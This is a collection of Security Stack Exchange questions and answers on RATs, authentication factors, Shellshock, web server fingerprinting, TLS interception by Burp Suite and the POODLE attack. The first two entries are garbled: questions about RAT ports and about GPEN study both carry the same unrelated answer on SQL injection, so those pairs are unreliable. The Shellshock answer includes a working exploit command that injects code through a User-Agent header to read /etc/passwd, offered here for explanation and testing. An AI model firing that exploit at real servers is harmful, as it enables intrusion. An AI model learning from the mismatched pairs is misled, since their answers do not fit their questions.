67,973 | I have a Windows 8.1 machine that seems to be acting weird and getting slow day by day. I believe that it may be a victim of Remote access Trojan(RAT) infection. How do I listen to ports on my PC and how do I close them if necessary ? How do I deduce that a port is associated with a RAT and how do I close it ? Will netstat be of any use in this respect ? | The character ' is used because this is the character limiter in SQL. With ' you delimit strings and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly you can end any string supplied to the application and add other SQL code after that. The character ; is used to terminate SQL statements. If you can send the character ; to an application and it is not escaped outside a string (see above) then you can terminate any SQL statement and create a new one which leaves a security breach. | {
"source": [
"https://security.stackexchange.com/questions/67973",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55990/"
]
} |
67,991 | I am planning for GPEN certification, although i have been extensively involved in penetration projects, still looking at the topics it seems a bit difficult.. what could be good study guide for preparation? | The character ' is used because this is the character limiter in SQL. With ' you delimit strings and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly you can end any string supplied to the application and add other SQL code after that. The character ; is used to terminate SQL statements. If you can send the character ; to an application and it is not escaped outside a string (see above) then you can terminate any SQL statement and create a new one which leaves a security breach. | {
"source": [
"https://security.stackexchange.com/questions/67991",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55995/"
]
} |
68,008 | I'm looking at some malware PCAPs, e.g. http://malware-traffic-analysis.net/2014/05/27/index.html . One of the things I've been seeing frequently is requests to alexa top million sites (e.g. yandex, google, yahoo). I've always considered this to be a connection checking technique. However, recently I've been thinking about other information you can glean from that request (e.g. a rough geoip feature through DNS / page redirection). I am looking for links on the subject and thoughts about this technique in common/uncommon malware. | Most likely, it's just trying to check if there's a working internet connection. The malware authors assume that: Google (or other Alexa Top-1M sites) will be up 99.999% of the time. Traffic going to common productivity sites like Google will not be flagged as unusual. You (or your network administrator) will be unlikely to have blocked these sites at the gateway. As such, Google is a good candidate. | {
"source": [
"https://security.stackexchange.com/questions/68008",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36448/"
]
} |
68,009 | I'm sure you've all heard of two-factor/multi-factor authentication. Basically it comes down to these factors: Knowledge - something you know (e.g. password, PIN, pattern) Possession - something you have (e.g. mobile phone, credit card, key) Existence - something you are (e.g. fingerprint) My question is: Does a fourth factor of authentication exist? A quick search on Google did not bring any interesting results other than a patent document that I didn't bother reading through. Could somewhere you are be considered a fourth factor? | As you noted, the main three are: Something you know Something you have Something you are I'd argue that there are others: Something you can do , e.g. accurately reproducing a signature. Something you exhibit , e.g. a particular personality trait, or even neurological behaviour that could be read by an fMRI. These are not strictly "are" features, as they're more fluid. Someone you know, e.g. authentication by chain of trust. Somewhere you are (or have access to), e.g. locking a session to an IP, or sending a confirmation pin to your address. This one is a bit tenuous in terms of being called an authentication factor, but it's still useful to note. | {
"source": [
"https://security.stackexchange.com/questions/68009",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28137/"
]
} |
68,071 | Paypal has a new payment option called "Bank Account" which says: Enter your online banking ID + password QUESTION : To me it sounds unsafe (ie: sends my password to a third-party organization like Paypal), but does there actually exist any security mechanism/protocol that they could be using to make this operation safe? Notes: Seen from Japan, on Firefox 32.0 Ubuntu 2014.04, URL starts with https://www.paypal.com/ The warning symbol in the URL says "Connection Partially Encrypted". | Once you submit that form, the information clearly goes to PayPal. So, yes, your password is definitely sent to PayPal. However, PayPal is saying that that it only uses your bank account credentials to confirm/verify your account . What seems to happen is that PayPal takes your information then sends it to your online banking provider for verification. What PayPal does with your credentials after that is unknown. They might store it for future payments, or they discard it after the verification process. In one line: Yes, your bank password goes to PayPal. Is it bad? Well, it depends on how much you trust PayPal. By comparison, in Finland we have a completely different system with PayPal. When PayPal needs to verify the bank account or withdraw from the bank account, you get redirected directly to the bank's online banking page. You login there, and then you get redirected back to PayPal. They only get a verification token from the bank. The system is called TUPAS . | {
"source": [
"https://security.stackexchange.com/questions/68071",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/634/"
]
} |
68,122 | I read some articles ( article1 , article2 , article3 , article4 ) about the Shellshock Bash bug ( CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the bug, what would be a simple and specific example of an attack vector / scenario that could exploit the bug? | A very simple example would be a cgi, /var/www/cgi-bin/test.cgi: #!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi" Then call it with wget to swap out the User Agent string. E.g. this will show the contents of /etc/passwd: wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/test.cgi To break it down: "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" Looks like: () {
test
}
echo \"Content-type: text/plain\"
echo
echo
/bin/cat /etc/passwd The problem as I understand it is that while it's okay to define a function in an environment variable, bash is not supposed to execute the code after it. The extra "Content-type:" is only for illustration. It prevents the 500 error and shows the contents of the file. The above example also shows how it's not a problem of programming errors, even normally safe and harmless bash cgi which doesn't even take user input can be exploited. | {
"source": [
"https://security.stackexchange.com/questions/68122",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19698/"
]
} |
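For reference, the same probe the answer above sends with wget can be sent from Python as well. This is an illustrative sketch only, reusing the hypothetical host and test.cgi path from the answer and a harmless echo marker instead of reading a file; it assumes the third-party requests library and should only ever be pointed at systems you are authorized to test:

```python
import requests   # third-party: pip install requests

# Hypothetical host running the test.cgi shown in the answer above.
url = "http://10.248.2.15/cgi-bin/test.cgi"

# A function-looking value followed by extra commands, delivered via the
# User-Agent header, which the web server exports as an environment
# variable before invoking the bash CGI script.
payload = '() { test;}; echo "Content-type: text/plain"; echo; echo; echo shellshocked'

resp = requests.get(url, headers={"User-Agent": payload}, timeout=5)
if "shellshocked" in resp.text:
    print("bash executed the injected command -> vulnerable")
else:
    print("no injection observed -> likely patched")
```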
68,123 | I've recently heard via Twitter about CVE-2014-6271. Are ordinary OS X desktops, that aren't acting as a web server, at risks of receiving attacks that could exploit this vulnerability? | Define "risk". The core of this attack is to create an environment variable that looks like a Bash scripting function but ends with the invocation of a program, and then cause Bash to be run. Bash will see the environment variable, parse it, and then keep parsing past the end of the function and run the program. Any method of triggering Bash execution with at least one attacker-controlled environment variable will work. Web server CGI attacks are getting the attention right now, but a user logging in over SSH could do it (a failed login, however, can't). It's possible that some FTP servers could trigger it (say, through running a post-upload script). A PackageMaker-based installer could trigger it, but if you're running a hostile installer, you've got bigger problems than this. There are probably many other ways as well. The average desktop user doing average desktop user activities is unlikely to have open attack vectors that could be used to trigger this bug, but Bash shows up in enough unexpected places that it's impossible to say for sure. | {
"source": [
"https://security.stackexchange.com/questions/68123",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8335/"
]
} |
68,168 | I did apt-get update; apt-get upgrade -y on all systems I'm running. I'm not sure if my /etc/apt/sources.list is good enough on all of these systems. I would like to quickly check each system again, ideally with a one-line shell command. Does such a one-line shell command exist and if so, what is it? Note this question is mainly about CVE-2014-6271. | Is my bash vulnerable? This simple command is a sufficient test to see if your version of bash is vulnerable: x='() { :;}; echo VULNERABLE' bash -c : It's not necessary to have extra text printed to signify that the command has actually run, because patched versions of bash will report a warning when a variable in its starting environment contains exploit code for the patched vulnerability. On a vulnerable system: $ x='() { :;}; echo VULNERABLE' bash -c :
VULNERABLE On a patched system: $ x='() { :;}; echo VULNERABLE' bash -c :
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x' For a detailed explanation of what this does and does not test for, and why, see "Other Function Parsing Bugs" below. Is my system vulnerable? If your bash isn't vulnerable then your system isn't vulnerable. If your bash is vulnerable, then your system is vulnerable inasmuch as it uses bash along attack vectors such as CGI scripts, DHCP clients and restricted SSH accounts. Check whether /bin/sh is bash or some other shell. The vulnerability is in a bash-specific feature and other shells such as dash and ksh are not affected. You can test the default shell by running the same test as above with sh instead of bash : x='() { :;}; echo VULNERABLE' sh -c : If you see an error message, then your system has a patched bash and isn't vulnerable. If you see VULNERABLE , then your system's default shell is bash and all attack vectors are a concern. If you see no output, then your system's default shell is not bash, and only parts of your system that use bash are vulnerable. Check for: Scripts executed by bash (starting with #!/bin/bash , not #!/bin/sh ) from CGI or by a DHCP client. Restricted SSH accounts whose shell is bash. How This Test Works It runs the command bash -c : with the literal text () { :;}; echo VULNERABLE set as the value of the environment variable x . The : builtin performs no action ; it's used here where a non-empty command is required. bash -c : creates an instance of bash that runs : and exits. Even this is sufficient to allow the vulnerability to be triggered. Even though bash is being invoked to run only one command (and that command is a no-op), it still reads its environment and interprets each variable whose contents start with () { as a function (at least those whose names are valid function names) and runs it so the function will be defined. The intent behind this behavior of bash is to run only a function definition, which makes a function available for use but doesn't actually run the code inside it. () { :;} is the definition for a function that performs no action when called. A space is required after { so that { is parsed as a separate token. A ; or newline is required before } for it to be accepted as correct syntax. See 3.3 Shell Functions in the Bash Reference Manual for more information on the syntax for defining shell functions in bash. But note that the syntax used (and recognized) by bash as a valid exported shell function whose definition it should run is more restrictive: It must start with the exact string () { , with exactly one space between ) and { . And while shell functions occasionally have their compound statement enclosed in ( ) instead of { } , they are still exported inside { } syntax. Variables whose contents start with () ( instead of () { will not test for or otherwise trigger the vulnerability. bash should stop executing code after the closing } . But (unless patched) it doesn't! This is the wrong behavior that constitutes CVE-2014-6271 ("Shellshock"). ; ends the statement that defines the function, allowing subsequent text to be read and run as a separate command. And the text after ; doesn't have to be another function definition--it can be anything at all. In this test, the command after ; is echo VULNERABLE . The leading space before echo does nothing and is present just for readability. The echo command writes text to standard output . The full behavior of echo is actually somewhat complicated, but that's unimportant here: echo VULNERABLE is simple. It displays the text VULNERABLE . 
Since echo VULNERABLE is only run if bash is unpatched and running code after function definitions in environment variables, this (and many other tests similar to it) is an effective test of whether or not the installed bash is vulnerable to CVE-2014-6271. Other Function Parsing Bugs (and why that test and those like it don't check for them) The patch that has been released as of this writing, and the commands described and explained above for checking vulnerability, apply to the very severe bug known as CVE-2014-6271. Neither this patch nor the commands described above for checking vulnerability apply to the related bug CVE-2014-7169 (nor should they be assumed to apply to any other bugs that may not yet have been discovered or disclosed). The bug CVE-2014-6271 arose from a combination of two problems: bash accepts function definitions in arbitrary environment variables, and while doing so, bash continues running any code that exists after the closing brace ( } ) of a function definition. As of this writing, the existing fix for CVE-2014-6271 that has been released (and rolled out by many downstream vendors)--that is, the fix you'd get by updating your system or by applying the existing patch manually--is a fix for 2 . But in the presence of other mistakes in bash's code, 1 is potentially a source of many additional parsing bugs. And we know at least one other such bug exists--specifically, CVE-2014-7169 . The command presented in this answer tests for whether or not an installed bash is patched with the existing (i.e., first official) fix for CVE-2014-6271. It tests vulnerability to that specific parsing bug : "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables[...]" That specific bug is extremely severe--and the available patch does fix it--while CVE-2014-7169 appears to be less severe but is definitely still cause for concern. As Stéphane Chazelas ( discoverer of the Shellshock bug ) has recently explained in an answer to When was the shellshock (CVE-2014-6271) bug introduced, and what is the patch that fully fixes it? on Unix.SE : There is a patch that prevents bash from interpreting anything else
than the function definition in there
( https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00081.html ),
and that's the one that has been applied in all the security updates
from the various Linux distributions. However, bash still interprets the code in there and any bug in the
interpreter could be exploited. One such bug has already been
found (CVE-2014-7169) though its impact is a lot smaller. So there will be
another patch coming soon. But if that's what the exploit looks like... Some people, here and elsewhere, have asked why x='() { :;}; echo VULNERABLE' bash -c : printing VULNERABLE (or similar) should be considered alarming. And I've recently seen the misconception circulating that because you have to have interactive shell access already to type in that particular command and press enter , Shellshock must somehow not be a serious vulnerability. Although some of the sentiments I've heard expressed--that we should not rush to panic, that desktop users behind NAT routers shouldn't put their lives on hold to build bash from source code--are quite correct, confusing the vulnerability itself with the ability to test for it by running some specific command (such as the command presented here) is a serious mistake. The command given in this post is an answer to the question, "Is there a short command to test if my server is secure against the shellshock bash bug?" It is not an answer to "What does shellshock look like when it's used against me by a real attacker?" and it is not an answer to the question, "What does someone have to do to successfully exploit this bug?" (And it is also not an answer to, "Is there a simple command to infer from all technical and social factors if I'm personally at high risk?") That command is a test, to see if bash will execute code written, in a particular way, in arbitrary environment variables. The Shellshock vulnerability is not x='() { :;}; echo VULNERABLE' bash -c : . Instead, that command (and others like it) is a diagnostic to help determine if one is affected by Shellshock. Shellshock has wide ranging consequences, though it is true that the risk is almost certainly less for desktop users who are not running remotely accessible network servers. (How much less is something I don't think we know at this point.) In contrast, the command x='() { :;}; echo VULNERABLE' bash -c : is entirely inconsequential except insofar as it is useful for testing for Shellshock (specifically, for CVE-2014-6271). For those who are interested, here are a few resources with information on why this bug is considered severe and why environment variables, particularly on network servers, may contain untrusted data capable of exploiting the bug and causing harm: Re: CVE-2014-6271: remote code execution through bash (Florian Weimer, Wed, 24 Sep 2014 17:03:19 +0200) Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271, CVE-2014-7169) What is a specific example of how the Shellshock Bash bug could be exploited? Attack scenarios of the new Bash vulnerability CVE-2014-6271 Bash Vulnerability example kasperd's answer to What does env x='() { :;}; command' bash do and why is it insecure? What is the severity of the new bash exploit (shellshock)? To further illustrate the conceptual distinction here, consider two hypotheticals: Imagine if instead of suggesting x='() { :;}; echo VULNERABLE' bash -c : as the test, I had suggested bash --version as the test. (That would actually not be particularly appropriate, because OS vendors frequently backport security patches to older versions of software. The version information a program gives you can, on some systems, make it look like the program would be vulnerable, when actually it has been patched.) If testing by running bash --version were being suggested, no one would say, "But attackers can't sit at my computer and type bash --version , so I must be fine!" 
This is the distinction between a test and the problem being tested for. Imagine if an advisory were issued suggesting that your car might have some safety problem, such as airbag failure or bursting into flames in a collision, and that factory demonstrations had been streamed. No one would say, "But I would never accidentally drive or tow my car 900 miles to the factory and have it loaded with an expensive crash dummy and slammed into a concrete wall. So I must be fine!" This is the distinction between a test and the problem being tested for. | {
"source": [
"https://security.stackexchange.com/questions/68168",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36782/"
]
} |
68,536 | I'm trying to detect what web server a particular website uses. For instance whether it's nginX, Apache, Tomcat and so on. I usually use Live HTTP Headers Firefox add-on. The problem is that sites sometimes hide their back-end. Isn't there a way to detect web servers when they're not present in HEADER? EDIT 1: A sample output from a website that didn't match to any of the @Question Overflow 's answer: HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 10:43:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
X-Powered-By: VideoHosting Framework/1.0.1
Cache-Control: no-cache, must-revalidate, no-cache="Set-Cookie", private
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Videohost/1.0.1 I even tried to use httprint on linux but it gives an ICMP request timeout on every website I tested. EDIT 2: The above HEADER is very similar to that of a website that I'm sure uses nginX.
If we remove those parts that are not present ( Connection , Pragma and so on) in the above HEADER, it looks very similar to nginX. I suppose Server is at the end of the response because they have customized it themselves. And because of that, nginX appended it to the end of the Response packet. HTTP/1.1 200 OK
Server: nginx
Date: Mon, 29 Sep 2014 12:51:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip OWASP should update its list with this one as well for nginX. ;-) | If a website does not use a custom-built server to modify the HTTP headers, you can try examining the order in which the HTTP response header fields are arranged. From OWASP : Apache 1.3.23 server: HTTP/1.1 200 OK
Date: ...
Server: ...
Last-Modified: ...
ETag: ...
Accept-Ranges: bytes
Content-Length: ...
Connection: ...
Content-Type: text/HTML Microsoft IIS 5.0 server: HTTP/1.1 200 OK
Server: ...
Expires: ...
Date: ...
Content-Type: text/HTML
Accept-Ranges: bytes
Last-Modified: ...
ETag: ...
Content-Length: ... Netscape Enterprise 4.1 server: HTTP/1.1 200 OK
Server: ...
Date: ...
Content-type: text/HTML
Last-modified: ...
Content-length: ...
Accept-ranges: bytes
Connection: ... SunONE 6.1 server: HTTP/1.1 200 OK
Server: ...
Date: ...
Content-length: ...
Content-type: text/html
Date: ...
Last-Modified: ...
Accept-Ranges: bytes
Connection: ... For further confirmation, you can send a malformed request , such as GET / HTTP/3.0 , to elicit a non-standard response. Example: Apache 1.3.23 and SunONE 6.1 servers: HTTP/1.1 400 Bad Request Microsoft IIS 5.0 server: HTTP/1.1 200 OK Netscape Enterprise 4.1 server: HTTP/1.1 505 HTTP Version Not Supported As the above information is pretty outdated, you may want to install a pentesting tool like httprint for automated web server fingerprinting . Web servers can obfuscate their signature or masquerade themselves as another server. Take the information with a pinch of salt, if you must. | {
"source": [
"https://security.stackexchange.com/questions/68536",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6142/"
]
} |
68,638 | I'm doing some research on the App of my telephone operator. I started Burp Suite on my Mac in proxy mode, then I opened up the App on my iPhone and started to sniff some traffic. I pressed the "login" button and this happened: My username and my password are there, in plaintext.
The connection is actually HTTPS, but if it's HTTPS, why can I read my username and password as plaintext parameters in the POST request? Is this normal? I also tried to replicate the login process with a curl command, and it works only if I use the -k parameter that skips the SSL certificate validation. What's going on here? | Burp Suite in proxy mode is able to decrypt the HTTPS traffic of any system that trusts it. It does this by generating its own certificate and using that certificate to register itself as a certificate authority on the system it is installed on. When it then proxies a request to an HTTPS webserver, it does the HTTPS handshake itself, decrypts the traffic, issues a certificate for the webserver signed by itself as a certificate authority, uses that certificate to re-encrypt the traffic, and sends both the forged certificate and the re-encrypted data to the client. This allows Burp Suite to eavesdrop on HTTPS traffic. A user who uses a normal proxy server or doesn't trust the Burp Suite pseudo-CA would not have their credentials compromised.
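If you want to see this trust decision from the client's side, here is a rough Node.js sketch (the host name is just a placeholder) that prints the issuer of the certificate the client is actually handed; when the connection is routed through an intercepting proxy such as Burp, the issuer that shows up is the proxy's own CA rather than the site's real one:
// Rough sketch: inspect the certificate a TLS endpoint actually presents to this client.
const tls = require('tls');
const socket = tls.connect({ host: 'api.example-operator.com', port: 443, rejectUnauthorized: false }, () => {
  const cert = socket.getPeerCertificate();
  console.log('subject:', cert.subject && cert.subject.CN);
  console.log('issuer :', cert.issuer && cert.issuer.CN);  // an intercepting proxy's CA shows up here
  console.log('trusted:', socket.authorized);              // false when the presented chain is not trusted
  socket.end();
});
This is also why the curl command in the question only worked with -k : like rejectUnauthorized: false above, it tells the client to carry on even though the intercepting proxy's certificate chain does not validate. | {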
"source": [
"https://security.stackexchange.com/questions/68638",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56712/"
]
} |
68,975 | It is often said that security tools such as firewalls, antivirus programs, etc. are only effective against random, untargeted attacks. If you are specifically targeted by an intentional, professional attacker (e.g. state sponsored, NSA, Chinese state attacker, or competitor looking to steal trade secrets) then most of these protections are useless. Is this true? If it is true, then what tools or techniques make a targeted attack from a professional attacker different? Does the attacker have a significant advantage over me? What strategies can I employ to reduce the risk of a successful attack? | Disclaimer: I work at a company developing security software to mitigate against targeted attacks. Some of the methods we use are similar to those used by attackers (when clients want to test their systems). For example, one client asked us to test their security by doing targeted [spear] phishing attacks. We emailed only the IT department with a combination of 2 emails. One was an apparently mis-addressed email to the board with a link to a Pdf named something like Executive bonus summary.pdf , the other purported to be a new external portal for the company to use during the Olympics ("Please check your domain credentials work correctly..."). With a quick search on social media, we could've made user-specific emails but that would be time consuming and ultimately wasn't necessary. We registered a domain name that was visually similar to the target's, then used it to host fake pages (styled identically to the real ones) and send DKIM signed emails (to avoid spam filters). Of the techies targeted, 43% gave us their corporate login details, 54% tried to download the bogus pdf (the pdf was just garbage bytes so it looked like a corrupt download. One guy tried 5 times using Firefox, IE and finally wget). We were told that only one user had detected the attack and reported it to management (but only after giving us their credentials). So... Getting into the company is not impossible. As for getting information out, our normal sales pitch includes a demo of us bypassing company firewalls/traditional DLP . I don't believe we've ever failed unless they're air-gapped or using a good data diode (although the rate of exfiltration varies. In one case, we had a restrictive white-listing firewall, so had the software encode documents into images and keep updating a profile picture on Google. Then we watched the profile externally and downloaded each chunk). That said, we've found time and again that software can be worked around but users are consistently the weakest link. So to answer your question, a targeted attack includes the personal touch. Custom websites designed to trick users, research into what software (and release) is being used to check for known vulnerabilities, investigations on social media, social engineering, etc, etc. Another one worth considering although less common is bribery/blackmail. If you're talking about state actors, it's not inconceivable. | {
"source": [
"https://security.stackexchange.com/questions/68975",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44376/"
]
} |
69,187 | The following quote is from the CompTIA Security+ guide: Single sign-on enhances security by requiring users to use and remember only one set of credentials for authentication. How is that enhancing security ? The way I see it is that it's rather a single point of failure. Isn't it more secure to have multiple different passwords for different accounts/services ? | The idea with a good single sign on is that there are fewer places for your credentials to be compromised. There are three reasons to use different passwords, first, because each unique place that stores your password (hopefully hashed) is another place it could get compromised. Second, because if your password is compromised, any other account using it would need to be updated and that is hard to do. Third because if your password is compromised, they could access multiple accounts if they were shared. SSO is a great advantage for the first two. A good SSO system should only store your account credentials in one location (which is hopefully far more fortified). All authentication is done against this one store. If your account is compromised, rather than having many places to update, only one password has to be changed and one account locked down. It doesn't particularly address the third concern, but it makes compromise less likely in the first place. Additionally, depending on the account, different passwords don't necessarily act as much of a barrier. There are plenty of reported examples of attackers using one compromised account to chain from account to account until they can get to the actual account they want. (For example, if they can access your e-mail account, then they can use password resets.) A good system of reporting compromises and allowing for the account to be locked down can make a decent help towards mitigating the risk though when suspicious activity is detected. The argument that completely unique credentials may be more secure than a good SSO setup is possibly valid, but in the real world, most people reuse credentials. SSO mitigates much of the risk of this behavior while still allowing the convenience people want. | {
"source": [
"https://security.stackexchange.com/questions/69187",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
69,195 | Quoting from CompTIA Security+ guide The first factor of authentication ( something you know , such as password or PIN) is the weakest factor. Why? it makes sense when we say that humans/users are the weakest factor in any system from security point of view as we humans forget, make mistakes and break easily. But it makes no sense (to me a least) that getting kidnapped and tortured (in order to give up my password) is more likely to happen than me losing a smart card or a key fob? | In the typical case, something you are and something you have can only be true for one person at a time. If you lose your token, you know you have lost it. Something you know can be copied by someone without your knowledge. If someone has your password, you may not be able to tell that they are actively exploiting that knowledge. That is one reason to change your password regularly. It shortens the window where a password breach could be exploited. | {
"source": [
"https://security.stackexchange.com/questions/69195",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
69,279 | I understand they are an attack on crypto algorithms as implemented on various processors, but how do they work? The online papers are too complex for me to understand. | "Fault attacks" are something you do on some hardware that is in your physical hands, but is shielded against intrusion ("tamper resistant"), and does computations with values that you don't know but would like to ("cryptographic keys"). Examples of such hardware are smart cards . A classic scenario would be: you have a smart card for a satellite-TV decoder; you got the card through a normal subscription to the broadcaster; you wish to make 3000 copies of that card so that you may resell them to people who want free/cheap TV. People do that. A fault attack is when you induce the shielded hardware to get things wrong by changing its environment. For instance, you try to run the card in an oven, at a temperature which is beyond the nominal operating temperature of the card. The attacker's hope is that by analysing what the card returns when it fails, he may gain some insight into the secret values stored in the card (this is of course very specific to what the card computes and how things are implemented in that card). A low-voltage fault attack is a fault attack where the fault is induced by feeding the hardware with a lower-than-normal voltage (in the "smart card" model, the card has its own CPU, RAM and ROM, but the current and clock signals are provided externally, i.e. are under the control of the attacker). For instance, if the card expects 3.3V, you give it only 2V. The real trick here is that the attacker can lower the voltage for only very short durations, a few clock cycles, so as to induce a fault in a specific part of the algorithm execution. | {
"source": [
"https://security.stackexchange.com/questions/69279",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
69,407 | If people use a password to log in to a UNIX server, then it could be forced to expire the password, then they change it. If people use an ssh key and have no passwords, no password expiry, then nothing forces them to change their SSH key regularly. Question: Which solution is more secure? Why do the "howto"'s for hardening a server always advise to use an ssh key, not passwords? UPDATE : not counting the brute-force weakness - regarding passwords, since they could be guessed if there is no Fail2ban-like solution. | Both keys and passwords have their pros and cons. The reason that "howtos" and the like advise using the SSH key is that they find their cons less worrisome than passwords' cons. SSH keys are long and complex, far more than any password could be. But as you state, they don't have expiry, and they sit on disk where they can be stolen from. On the other hand, they don't get transmitted to the remote system (except key forwarding, natch) which passwords need to be. Passwords are generally, predictably, unavoidably weak. While it is possible to have strong passwords, time and again it has been shown that people will use weak passwords and have poor password practices... short, simple, word-based, simple patterns ("p@ssw0rd!"), write them down, use them on multiple sites, base them on their phone number, their children's birthdate, their own name. You point out that keys don't expire, but why do passwords expire? To ensure that a brute-force attack is less likely to crack a password before it's been replaced. Not an issue that impacts keys. And, bad passwords aside, even "good" passwords are vulnerable to brute-force (online or offline) under the right conditions. They have to get transmitted to the other system, or to any other place that the user can be fooled into sending them by mistake. The balance of evidence strongly suggests that passwords are weaker and keys are stronger. | {
"source": [
"https://security.stackexchange.com/questions/69407",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56819/"
]
} |
70,501 | I'm going to print some business cards, and along with my email address I was thinking of putting my PGP ID on it as well. After doing some research I found that using the short ID is not a good idea. What is the best way of doing this - or should I forget about it? | Considering that your public key is only usable by a computer 1 ; you can remove clutter from your business card by having all electronic data accessible online and referred to by a QR code . The link could refer to a vCard file stored on, say, a public Dropbox. As the vCard format can store any business or contact information including OpenPGP keys . Alternately a high resolution QR code could store the entire public key on the back of your business card. Which has certain security advantages. 1. Hand ciphers notwithstanding. | {
"source": [
"https://security.stackexchange.com/questions/70501",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22488/"
]
} |
70,645 | I used to work in a small office which provided basic desktop support for users. One day I had to answer a call from a very angry customer and he asked for my boss. He wanted to know how one email could slip through their spam filter/network-based antivirus software (if there is such a thing, that's what he claimed), while the attachment got filtered/caught by the antivirus software on his desktop. Till I could reach my boss I had to tell him that a spam filter is not flawless/perfect and sometimes one email manages to pass. Also, to support my claims, I explained to him that Gmail themselves had allowed that email and its attachment through, even though his antivirus software had detected and removed it. Was my explanation right? How would a security expert deal with this situation? | Your answer is pretty OK, but you could explain the ongoing "game" between spammers and spam filters a bit more. This makes it understandable why some spam will always find its way to the customer. Spam filters try to catch all mail that is spam. Spammers try to create mails that are trusted not to be spam - both by spam filters and by humans. For spammers, this comes down to creating mails that... can pass spam filters; look like legit email once they arrive in the inbox, so the user opens them; and are interesting enough that users click on the link inside to buy something or have malware installed. Spammers buy spam filters, and test their new spam tactics to see if their mail passes the filter. If the mail passes, they are one step ahead. Then they go out in the wild, send out millions of mails, effectively showing their new tactic. The spam-filter makers notice, and they update their filter. This is an ongoing game. It's similar in the virus industry. When you see spam that has no links or attachments, it is probably spam to poison filters, to confuse filters, to make it easier to fool them later on. | {
"source": [
"https://security.stackexchange.com/questions/70645",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
70,719 | Canonical question regarding the recently disclosed padding oracle vulnerability in SSL v3. Other identical or significantly similar questions should be closed as a duplicate of this one. What is the POODLE vulnerability? I use [ product / browser ]. Am I affected? Is [ product ] vulnerable to the POODLE attack? What do I need to do to secure my [ product ] with respect to this vulnerability? How do I detect POODLE attacks on my network? Are there any known POODLE attacks? References: Google security announcement POODLE Whitepaper (PDF) | What is the Poodle vulnerability ? The "Poodle" vulnerability, released on October 14th, 2014 , is an attack on the SSL 3.0 protocol. It is a protocol flaw, not an implementation issue; every implementation of SSL 3.0 suffers from it. Please note that we are talking about the old SSL 3.0, not TLS 1.0 or later. The TLS versions are not affected (neither is DTLS). In a nutshell: when SSL 3.0 uses a block cipher in CBC mode, the encryption process for a record uses padding so that the data length is a multiple of the block size. For instance, suppose that 3DES is used, with 8-byte blocks. A MAC is computed over the record data (and the record sequence number, and some other header data) and appended to the data. Then 1 to 8 bytes are appended, so that the total length is a multiple of 8. Moreover, if n bytes are added at that step, then the last of these bytes must have value n-1 . This is made so that decryption works. Consider the decryption of a record: 3DES-CBC decryption is applied, then the very last byte is inspected: it should contain a value between 0 and 7, and that tells us how many other bytes were added for padding. These bytes are removed, and, crucially, their contents are ignored . This is the important point: there are bytes in the record that can be changed without the recipient minding in the slightest way. The Poodle attack works in a chosen-plaintext context, like BEAST and CRIME before it. The attacker is interested in data that gets protected with SSL, and he can: inject data of their own before and after the secret value that he wants to obtain; inspect, intercept and modify the resulting bytes on the wire. The main and about only plausible scenario where such conditions are met is a Web context: the attacker runs a fake WiFi access point, and injects some Javascript of their own as part of a Web page (HTTP, not HTTPS) that the victim browses. The evil Javascript makes the browser send requests to a HTTPS site (say, a bank Web site) for which the victim's browser has a cookie . The attacker wants that cookie. The attack proceeds byte-by-byte. The attacker's Javascript arranges for the request to be such that the last cookie byte occurs at the end of an encryption block (one of the 8-byte blocks of 3DES) and such that the total request length implies a full-block padding. Suppose that the last 8 cookie bytes have values c 0 , c 1 , ... c 7 . Upon encryption, CBC works like this: So if the previous encrypted block is e 0 , e 1 , ... e 7 , then what enters 3DES is c 0 XOR e 0 , c 1 XOR e 1 , ... c 7 XOR e 7 . The e i values are known to the attacker (that's the encrypted result). Then, the attacker, from the outside, replaces the last block of the encrypted record with a copy of the block that contains the last cookie byte. To understand what happens, you have to know how CBC decryption works: The last ciphertext block thus gets decrypted, which yields a value ending with c 7 XOR e 7 . 
